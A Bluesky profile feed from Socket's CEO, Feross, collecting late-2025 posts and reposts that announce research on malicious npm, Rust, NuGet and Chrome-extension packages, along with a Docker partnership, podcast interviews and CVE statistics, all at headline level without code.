Feross
@feross.bsky.social
🧙♂️ Mad scientist • ✨ Founder + CEO @Socket.dev (http://socket.dev) •🌲 Stanford lecturer (http://cs253.stanford.edu) • ❤️ Open source at WebTorrent + StandardJS
Pinned
Feross
@feross.bsky.social
· Nov 19
🚀 Big news for JavaScript teams: Socket now supports Bun and vlt in beta.
You no longer have to choose between innovation and security. Commit a bun.lock or vlt-lock.json and Socket gives you full supply chain protection.
You no longer have to choose between innovation and security. Commit a bun.lock or vlt-lock.json and Socket gives you full supply chain protection.
Reposted by Feross
🚨 New research: A spearphishing campaign published 27 malicious npm packages that host browser-run lures mimicking document portals and Microsoft sign-in to steal credentials. This operation targets manufacturing and healthcare orgs in the U.S. and allied countries.
socket.dev/blog/spearph...
socket.dev/blog/spearph...
Spearphishing Campaign Abuses npm Registry to Target U.S. an...
A five-month operation turned 27 npm packages into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in, ta...
socket.dev
December 23, 2025 at 7:47 PM
🚨 New research: A spearphishing campaign published 27 malicious npm packages that host browser-run lures mimicking document portals and Microsoft sign-in to steal credentials. This operation targets manufacturing and healthcare orgs in the U.S. and allied countries.
socket.dev/blog/spearph...
socket.dev/blog/spearph...
Reposted by Feross
Another example of attackers abusing npm as infrastructure. Our threat research team found a spearphishing campaign that published 27 malicious packages to host browser-run phishing pages.
cc: @campuscodi.risky.biz @cisoseries.bsky.social @zackwhittaker.com
cc: @campuscodi.risky.biz @cisoseries.bsky.social @zackwhittaker.com
🚨 New research: A spearphishing campaign published 27 malicious npm packages that host browser-run lures mimicking document portals and Microsoft sign-in to steal credentials. This operation targets manufacturing and healthcare orgs in the U.S. and allied countries.
socket.dev/blog/spearph...
socket.dev/blog/spearph...
Spearphishing Campaign Abuses npm Registry to Target U.S. an...
A five-month operation turned 27 npm packages into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in, ta...
socket.dev
December 23, 2025 at 8:32 PM
Another example of attackers abusing npm as infrastructure. Our threat research team found a spearphishing campaign that published 27 malicious packages to host browser-run phishing pages.
cc: @campuscodi.risky.biz @cisoseries.bsky.social @zackwhittaker.com
cc: @campuscodi.risky.biz @cisoseries.bsky.social @zackwhittaker.com
Reposted by Feross
Don’t trust free VPNs, don’t install joke Chrome extensions. You know what, just don’t install anything at all from now on. And get a new PC.
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.
Full research → socket.dev/blog/malicio...
Full research → socket.dev/blog/malicio...
Malicious Chrome Extensions “Phantom Shuttle” Masquerade as ...
Fake “Phantom Shuttle” VPN Chrome extensions (active since 2017) hijack proxy auth to intercept traffic and continuously exfiltrate user credentials t...
socket.dev
December 23, 2025 at 5:43 AM
Don’t trust free VPNs, don’t install joke Chrome extensions. You know what, just don’t install anything at all from now on. And get a new PC.
Reposted by Feross
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.
Full research → socket.dev/blog/malicio...
Full research → socket.dev/blog/malicio...
Malicious Chrome Extensions “Phantom Shuttle” Masquerade as ...
Fake “Phantom Shuttle” VPN Chrome extensions (active since 2017) hijack proxy auth to intercept traffic and continuously exfiltrate user credentials t...
socket.dev
December 22, 2025 at 9:21 PM
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.
Full research → socket.dev/blog/malicio...
Full research → socket.dev/blog/malicio...
Reposted by Feross
Chrome extensions are still a wild west ecosystem.
This fake “VPN” ran for years and charged users for the privilege of silently intercepting their traffic.
cc: @campuscodi.risky.biz @zackwhittaker.com @cisoseries.bsky.social
This fake “VPN” ran for years and charged users for the privilege of silently intercepting their traffic.
cc: @campuscodi.risky.biz @zackwhittaker.com @cisoseries.bsky.social
🚨 Socket’s Threat Research Team uncovered two malicious "Phantom Shuttle" Chrome extensions masquerading as a VPN since at least 2017, intercepting traffic and exfiltrating credentials via attacker-controlled proxies.
Full research → socket.dev/blog/malicio...
Full research → socket.dev/blog/malicio...
Malicious Chrome Extensions “Phantom Shuttle” Masquerade as ...
Fake “Phantom Shuttle” VPN Chrome extensions (active since 2017) hijack proxy auth to intercept traffic and continuously exfiltrate user credentials t...
socket.dev
December 22, 2025 at 9:58 PM
Chrome extensions are still a wild west ecosystem.
This fake “VPN” ran for years and charged users for the privilege of silently intercepting their traffic.
cc: @campuscodi.risky.biz @zackwhittaker.com @cisoseries.bsky.social
This fake “VPN” ran for years and charged users for the privilege of silently intercepting their traffic.
cc: @campuscodi.risky.biz @zackwhittaker.com @cisoseries.bsky.social
Reposted by Feross
Free JavaScript security course from @openjsf.org / @linuxfoundation.org training.linuxfoundation.org/training/int...
Introduction to JavaScript Security (LFS184) | Linux Foundation Education
Master secure coding with our free course, Introduction to JavaScript Security (LFS184)—essential for today’s web developers.
training.linuxfoundation.org
December 22, 2025 at 6:03 PM
Free JavaScript security course from @openjsf.org / @linuxfoundation.org training.linuxfoundation.org/training/int...
Congrats @docker.com! This is the right move for the ecosystem.
In case you missed this detail: with Docker Hardened Images teams get secure application dependencies by default. @socket.dev Firewall is built in.
In case you missed this detail: with Docker Hardened Images teams get secure application dependencies by default. @socket.dev Firewall is built in.
Hardened images should be the baseline, not a bonus feature.
@thenewstack.io breaks down why we made Docker Hardened Images free. Featuring Docker's VP of Product, Mike Donovan, on security, open source, and what comes next.
🔗 https://bit.ly/3N4DXt6
#DHI #OpenSource
@thenewstack.io breaks down why we made Docker Hardened Images free. Featuring Docker's VP of Product, Mike Donovan, on security, open source, and what comes next.
🔗 https://bit.ly/3N4DXt6
#DHI #OpenSource
Docker Sets Free the Hardened Container Images
Docker has made Docker Hardened Images (DHI) a fee service, offering prepatched, secure SBOM-ready versions of widely used open source applications.
thenewstack.io
December 17, 2025 at 7:03 PM
Congrats @docker.com! This is the right move for the ecosystem.
In case you missed this detail: with Docker Hardened Images teams get secure application dependencies by default. @socket.dev Firewall is built in.
In case you missed this detail: with Docker Hardened Images teams get secure application dependencies by default. @socket.dev Firewall is built in.
Reposted by Feross
We’re partnering with @docker.com to make software development safer for everyone!
Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection for @nodejs.org, @python.org, and @rust-lang.org
socket.dev/blog/socket-...
Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection for @nodejs.org, @python.org, and @rust-lang.org
socket.dev/blog/socket-...
Socket Firewall Now Available in Docker Hardened Images - So...
Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection on top of hardened b...
socket.dev
December 17, 2025 at 3:39 PM
We’re partnering with @docker.com to make software development safer for everyone!
Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection for @nodejs.org, @python.org, and @rust-lang.org
socket.dev/blog/socket-...
Socket Firewall Free is now bundled into Docker Hardened Images, adding build-time and dependency-install supply chain protection for @nodejs.org, @python.org, and @rust-lang.org
socket.dev/blog/socket-...
Reposted by Feross
🥷 In this @softwaredaily.bsky.social episode, @feross.bsky.social talks about the dark side of Chrome extensions getting bought and sold to unknown buyers, a super common supply chain risk most users never see.
Check out the full episode → socket.dev/blog/softwar...
Check out the full episode → socket.dev/blog/softwar...
December 15, 2025 at 9:37 PM
🥷 In this @softwaredaily.bsky.social episode, @feross.bsky.social talks about the dark side of Chrome extensions getting bought and sold to unknown buyers, a super common supply chain risk most users never see.
Check out the full episode → socket.dev/blog/softwar...
Check out the full episode → socket.dev/blog/softwar...
Reposted by Feross
It's not only NPM.
🚨 New threat research: An impostor #NuGet package typosquatted a popular .NET tracing library and its author, using homoglyph tricks to blend in, then exfiltrated #Stratis wallet JSON and passwords to a Russian IP address.
Full report →
socket.dev/blog/malicio... #dotnet
Full report →
socket.dev/blog/malicio... #dotnet
Malicious NuGet Package Typosquats Popular .NET Tracing Libr...
Impostor NuGet package Tracer.Fody.NLog typosquats Tracer.Fody and its author, using homoglyph tricks, and exfiltrates Stratis wallet JSON/passwords t...
socket.dev
December 15, 2025 at 10:26 PM
It's not only NPM.
Reposted by Feross
This is an extremely convincing typosquat. Also a good reminder that Google’s AI summaries are not a reliable way to determine whether a package is safe to use. 😵💫
🚨 New threat research: An impostor #NuGet package typosquatted a popular .NET tracing library and its author, using homoglyph tricks to blend in, then exfiltrated #Stratis wallet JSON and passwords to a Russian IP address.
Full report →
socket.dev/blog/malicio... #dotnet
Full report →
socket.dev/blog/malicio... #dotnet
Malicious NuGet Package Typosquats Popular .NET Tracing Libr...
Impostor NuGet package Tracer.Fody.NLog typosquats Tracer.Fody and its author, using homoglyph tricks, and exfiltrates Stratis wallet JSON/passwords t...
socket.dev
December 15, 2025 at 4:38 PM
This is an extremely convincing typosquat. Also a good reminder that Google’s AI summaries are not a reliable way to determine whether a package is safe to use. 😵💫
Reposted by Feross
🔮 The Myth of Magical Code from the Sky: Modern apps run on mountains of open source code that almost no one is actually reviewing.
In this @softwaredaily.bsky.social episode, @feross.bsky.social joins @joshuakgoldberg.com to talk about why that’s so risky.
Check it out→ socket.dev/blog/softwar...
In this @softwaredaily.bsky.social episode, @feross.bsky.social joins @joshuakgoldberg.com to talk about why that’s so risky.
Check it out→ socket.dev/blog/softwar...
December 12, 2025 at 2:18 AM
🔮 The Myth of Magical Code from the Sky: Modern apps run on mountains of open source code that almost no one is actually reviewing.
In this @softwaredaily.bsky.social episode, @feross.bsky.social joins @joshuakgoldberg.com to talk about why that’s so risky.
Check it out→ socket.dev/blog/softwar...
In this @softwaredaily.bsky.social episode, @feross.bsky.social joins @joshuakgoldberg.com to talk about why that’s so risky.
Check it out→ socket.dev/blog/softwar...
Reposted by Feross
🧨 “Gaps in design and implementation with the new OIDC Trusted Publisher workflows leave maintainers open to novel and increasingly difficult to detect gaps in their publishing setups. We do not recommend critical projects move to this new workflow..." - @notwes.bsky.social
npm has revoked classic tokens for publishing, pushing maintainers toward OIDC trusted publishing or granular tokens. But @openjsf.org warns trusted publishing still has risky gaps for critical projects. What maintainers should do next:
socket.dev/blog/npm-rev... #NodeJS #JavaScript
socket.dev/blog/npm-rev... #NodeJS #JavaScript
npm Revokes Classic Tokens, as OpenJS Warns Maintainers Abou...
GitHub has revoked npm classic tokens for publishing; maintainers must migrate, but OpenJS warns OIDC trusted publishing still has risky gaps for crit...
socket.dev
December 10, 2025 at 6:03 AM
🧨 “Gaps in design and implementation with the new OIDC Trusted Publisher workflows leave maintainers open to novel and increasingly difficult to detect gaps in their publishing setups. We do not recommend critical projects move to this new workflow..." - @notwes.bsky.social
Reposted by Feross
Feross Aboukhadijeh is the founder and CEO of @socket.dev. He joins @joshuakgoldberg.com to talk about his career, open source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more.
@feross.bsky.social
bit.ly/4iMDU14
@feross.bsky.social
bit.ly/4iMDU14
Blocking Software Supply Chain Attacks with Feross Aboukhadijeh - Software Engineering Daily
Modern software relies heavily on open source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation but also creates serious sup...
softwareengineeringdaily.com
December 9, 2025 at 10:36 AM
Feross Aboukhadijeh is the founder and CEO of @socket.dev. He joins @joshuakgoldberg.com to talk about his career, open source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more.
@feross.bsky.social
bit.ly/4iMDU14
@feross.bsky.social
bit.ly/4iMDU14
Reposted by Feross
Want to work with me and a number of world-class JS open source developers at @socket.dev protecting ALL open source libraries from supply chain attacks?
We're looking for stellar frontend developers. DM me
We're looking for stellar frontend developers. DM me
December 10, 2025 at 6:12 PM
Want to work with me and a number of world-class JS open source developers at @socket.dev protecting ALL open source libraries from supply chain attacks?
We're looking for stellar frontend developers. DM me
We're looking for stellar frontend developers. DM me
Excellent work, crates.io team!
This typosquat is all fancied up to look legit, seems like the threat actor put in a lot of effort here. We were once again impressed by how fast the crates.io team took it down! 👏
cc: @thisweekinrust.bsky.social @rustaceans.bsky.social @theembeddedrust.bsky.social @campuscodi.risky.biz
cc: @thisweekinrust.bsky.social @rustaceans.bsky.social @theembeddedrust.bsky.social @campuscodi.risky.biz
🚨 New Socket Threat Research: We found a malicious typosquat targeting Rust devs. The finch-rust crate mimics the legit finch crate but loads a credential-stealing payload and exfiltrates data to rust-docs-build[.]vercel[.]app.
Details + IOCs: socket.dev/blog/malicio... #Rustlang
Details + IOCs: socket.dev/blog/malicio... #Rustlang
December 5, 2025 at 11:40 PM
Excellent work, crates.io team!
CVE volume is ahead of last year, even with a small dip in November.
42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.
The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.
42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.
The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.
December 5, 2025 at 9:12 PM
CVE volume is ahead of last year, even with a small dip in November.
42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.
The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.
42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.
The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.
Reposted by Feross
Malicious Rust packages targeted Web3 developers
📖 Read more: www.helpnetsecurity.com/2025/12/04/m...
#cybersecurity #Cybersecuritynews @socket.dev #web3 #Rust
📖 Read more: www.helpnetsecurity.com/2025/12/04/m...
#cybersecurity #Cybersecuritynews @socket.dev #web3 #Rust
Malicious Rust packages targeted Web3 developers - Help Net Security
Two malicious Rust crates (packages) have been pulled from crates.io, but not before having been downloaded nearly 15,000 times.
www.helpnetsecurity.com
December 4, 2025 at 3:07 PM
Malicious Rust packages targeted Web3 developers
📖 Read more: www.helpnetsecurity.com/2025/12/04/m...
#cybersecurity #Cybersecuritynews @socket.dev #web3 #Rust
📖 Read more: www.helpnetsecurity.com/2025/12/04/m...
#cybersecurity #Cybersecuritynews @socket.dev #web3 #Rust
Reposted by Feross
A reality for anyone scaling a team:
"What got you from zero to one is not what's going get you from one to 10. So you have to constantly evolve the way you run your business." -
@feross.bsky.social on the Vlad Kachur Show
🧨 Full Interview: socket.dev/blog/scaling...
"What got you from zero to one is not what's going get you from one to 10. So you have to constantly evolve the way you run your business." -
@feross.bsky.social on the Vlad Kachur Show
🧨 Full Interview: socket.dev/blog/scaling...
December 2, 2025 at 8:30 PM
A reality for anyone scaling a team:
"What got you from zero to one is not what's going get you from one to 10. So you have to constantly evolve the way you run your business." -
@feross.bsky.social on the Vlad Kachur Show
🧨 Full Interview: socket.dev/blog/scaling...
"What got you from zero to one is not what's going get you from one to 10. So you have to constantly evolve the way you run your business." -
@feross.bsky.social on the Vlad Kachur Show
🧨 Full Interview: socket.dev/blog/scaling...
Happy holidays!
🙄 The holiday themed npm spam has arrived: 420+ auto-generated elf-stats-* packages claiming to be published every 2 min. This is just registry abuse at scale, and it’s a waste of everyone’s time. Nobody is going to accidentally install these packages but they're still unsafe to run. #NodeJS
Seasonal nuisance on npm this morning: 420+ auto-generated elf-stats-* packages, many claiming “generated every two minutes,” published from new throwaway accounts. Payloads are simple but unsafe (exfil / preinstall scripts). npm is already removing packages.
socket.dev/blog/elves-o... #NodeJS
socket.dev/blog/elves-o... #NodeJS
December 3, 2025 at 5:33 PM
Happy holidays!
Reposted by Feross
Major props to the Crates.io team - they removed this crate within just minutes of it being reported. 💪
cc: @campuscodi.risky.biz @thisweekinrust.bsky.social @theembeddedrust.bsky.social @rustaceans.bsky.social @weeklyrust.substack.com.web.brid.gy
cc: @campuscodi.risky.biz @thisweekinrust.bsky.social @theembeddedrust.bsky.social @rustaceans.bsky.social @weeklyrust.substack.com.web.brid.gy
🚨 New Socket Threat Research: We found a malicious Rust crate disguised as an EVM version helper that downloads & silently executes OS-specific payloads, likely for crypto theft. The crate was live for 8 months and was swiftly removed after we reported it.
socket.dev/blog/malicio... #Rustlang
socket.dev/blog/malicio... #Rustlang
Malicious Rust Crate evm-units Serves Cross-Platform Payload...
Malicious Rust crate evm-units disguised as an EVM version helper downloads and silently executes OS-specific payloads likely aimed at crypto theft.
socket.dev
December 3, 2025 at 4:24 AM
Major props to the Crates.io team - they removed this crate within just minutes of it being reported. 💪
cc: @campuscodi.risky.biz @thisweekinrust.bsky.social @theembeddedrust.bsky.social @rustaceans.bsky.social @weeklyrust.substack.com.web.brid.gy
cc: @campuscodi.risky.biz @thisweekinrust.bsky.social @theembeddedrust.bsky.social @rustaceans.bsky.social @weeklyrust.substack.com.web.brid.gy
Reposted by Feross
🎙️ Why great products don't always win: Socket CEO @feross.bsky.social breaks down a hard truth for technical founders in this conversation with Vlad Kachur on scaling a security company.
Check out the full interview → socket.dev/blog/scaling... #appsec #infosec
Check out the full interview → socket.dev/blog/scaling... #appsec #infosec
December 2, 2025 at 4:25 PM
🎙️ Why great products don't always win: Socket CEO @feross.bsky.social breaks down a hard truth for technical founders in this conversation with Vlad Kachur on scaling a security company.
Check out the full interview → socket.dev/blog/scaling... #appsec #infosec
Check out the full interview → socket.dev/blog/scaling... #appsec #infosec
Reposted by Feross
The Socket Threat Research Team continues to track North Korea’s Contagious Interview operation as it systematically infiltrates the npm ecosystem. socket.dev/blog/north-k... @socket.dev
Inside the GitHub Infrastructure Powering North Korea’s Cont...
Socket Threat Research maps a rare inside look at OtterCookie’s npm-Vercel-GitHub chain, adding 197 malicious packages and evidence of North Korean op...
socket.dev
December 1, 2025 at 12:53 PM
The Socket Threat Research Team continues to track North Korea’s Contagious Interview operation as it systematically infiltrates the npm ecosystem. socket.dev/blog/north-k... @socket.dev
More malicious Chrome extensions.
Stay vigilant!
Stay vigilant!
🚨 Socket researchers uncovered a malicious Chrome extension that injects hidden #SOL transfers into Raydium swaps, quietly siphoning fees to an attacker wallet.
Full analysis → socket.dev/blog/malicio... #Solana
Full analysis → socket.dev/blog/malicio... #Solana
Malicious Chrome Extension Injects Hidden SOL Fees Into Sola...
Socket researchers identified a malicious Chrome extension that manipulates Raydium swaps to inject an undisclosed SOL transfer, quietly routing fees ...
socket.dev
November 25, 2025 at 7:57 PM
More malicious Chrome extensions.
Stay vigilant!
Stay vigilant!
Reposted by Feross
Update: at time of writing Eleventy core (0.x, 1.x, 2.x, 3.x, 4.x prereleases) and our official plugins are still unaffected.
(Compromised package count was updated to 834 from 533 in the latest @socket.dev update)
(Compromised package count was updated to 834 from 533 in the latest @socket.dev update)
⚠️ Major Update on the Shai Hulud v2 campaign:
We’ve confirmed 834 malicious packages and now see spillover into Maven Central. The package org.mvnpm:posthog-node:4.18.1 contains the same Bun-based payload used in the npm compromise.
Updated analysis →
socket.dev/blog/shai-hu... #Java
We’ve confirmed 834 malicious packages and now see spillover into Maven Central. The package org.mvnpm:posthog-node:4.18.1 contains the same Bun-based payload used in the npm compromise.
Updated analysis →
socket.dev/blog/shai-hu... #Java
Shai Hulud Strikes Again (v2) - Socket
Another wave of Shai-Hulud campaign has hit npm with more than 500 packages and 700+ versions affected.
socket.dev
November 25, 2025 at 7:11 PM
Update: at time of writing Eleventy core (0.x, 1.x, 2.x, 3.x, 4.x prereleases) and our official plugins are still unaffected.
(Compromised package count was updated to 834 from 533 in the latest @socket.dev update)
(Compromised package count was updated to 834 from 533 in the latest @socket.dev update)